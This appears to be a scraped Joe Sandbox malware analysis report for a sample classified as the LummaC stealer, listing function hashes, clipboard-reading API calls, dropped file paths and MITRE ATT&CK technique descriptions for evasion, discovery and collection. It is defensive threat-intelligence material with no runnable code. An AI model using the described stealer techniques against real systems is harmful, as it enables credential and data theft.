Instruction ID: 2a1f8786e57ac75cabea301cd0276fa97a5f0ebf22f9ea4dc2b43fc85353e0c3
Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction Fuzzy Hash: 0A11E3747407844FD3198F24CCD2EA6B7A2ABD6318719853CB8429BB93C66CAC45C764

Function 0040E83B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8

Function 009370E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
Instruction ID: 81e030c1aa73416e5b347f3ad36c682fef5db301edd886b2c55fbe05a2c3840f
Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
Instruction Fuzzy Hash: E2F0EDB5E0C3849BC71CDF28D49066AFBE5AB9A700F10693DE48AA3351DB31D545CB4A

Function 00937797 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
Instruction ID: dbecbd71afee03a7e6198747cc89645bc4b918049c0d5a6791c43f09b7a4a657
Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
Instruction Fuzzy Hash: 70F069B410D3919FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C9028B4A

Function 009354D1 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
Instruction ID: 3bcb8442348f4a93719a2c0b01ceee9a0d91eac7e41b9712bc9757fdd3572da6
Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
Instruction Fuzzy Hash: 8AF0EDB5688301BAF6248A00CC43F6BB6B49B95B04F301518B344790E0E5E1B549870E

Function 0042526A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E

Function 0094AD19 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: ba5840de3a7b8fde8c09a0dd0c8bf9b26c6ef5df560458f84079555b55b5a561
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: DFF0A735B456808BE704CF38E82195ABBE6E387324F145A7DD641D3751D639C8018605

Function 0043AAB2 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609

Function 009363B6 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
Instruction ID: cccaf658908e528895504ed9e1aa40b39faff5c8c41877893e5317c54ddd0901
Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
Instruction Fuzzy Hash: A0D0972880C63AE30E290E1401100BCB7368A03701F0AD5E4DCC13F082CB76EC071A58

Function 0094C268 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19

Function 0093559D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E

Function 0094C79B Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C

Function 00941337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00941347
GetWindowLongW.USER32 ref: 0094136C
GetClipboardData.USER32 ref: 0094137C
GlobalLock.KERNEL32 ref: 00941395
GlobalUnlock.KERNEL32 ref: 009414A7
CloseClipboard.USER32 ref: 009414B0

Strings

P, xrefs: 00941402
x, xrefs: 009413E4
], xrefs: 009413F8
W, xrefs: 0094140C
j, xrefs: 00941411
(, xrefs: 00941425

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
Instruction ID: d836cf9e710a8a6187f2623a3abc453dfb2d779b97eed588ec53c102729d09ce
Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
Instruction Fuzzy Hash: 78418F7150C7818ED301EF78D88876FBEE09F86314F094A7DE4E986392D6788588D793

Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004310E0
GetWindowLongW.USER32 ref: 00431105
GetClipboardData.USER32 ref: 00431115
GlobalLock.KERNEL32 ref: 0043112E
GlobalUnlock.KERNEL32 ref: 00431240
CloseClipboard.USER32 ref: 00431249

Strings

], xrefs: 00431191
W, xrefs: 004311A5
(, xrefs: 004311BE
P, xrefs: 0043119B
x, xrefs: 0043117D
j, xrefs: 004311AA

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797

Function 0093FAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0093FAAC
VariantInit.OLEAUT32 ref: 0093FABF

Strings

L, xrefs: 0093FB41

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: c26aab4c4bbc3e610b19428a13910d3daf4f15d65bd204aa2ac72baabf7005ef
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: FD412B7150CBC18ED321DB38845865FBFE16BE6220F188A9CE5F5873E2D6748549CB53

Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F845
VariantInit.OLEAUT32 ref: 0042F858

Strings

L, xrefs: 0042F8DA

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53

Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004322EE
GetSystemMetrics.USER32 ref: 004322FD

Strings

, xrefs: 004323A8

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wN8pQhRNnu.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5759.tmp.exe_c4d0347ebf67134b9ee4749dcf952ec5ae37963a_94fabcbd_e94f106d-fe59-4526-aa6f-4006b8b2ba61\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER65D0.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER66DA.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6739.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\5759.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
wN8pQhRNnu.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre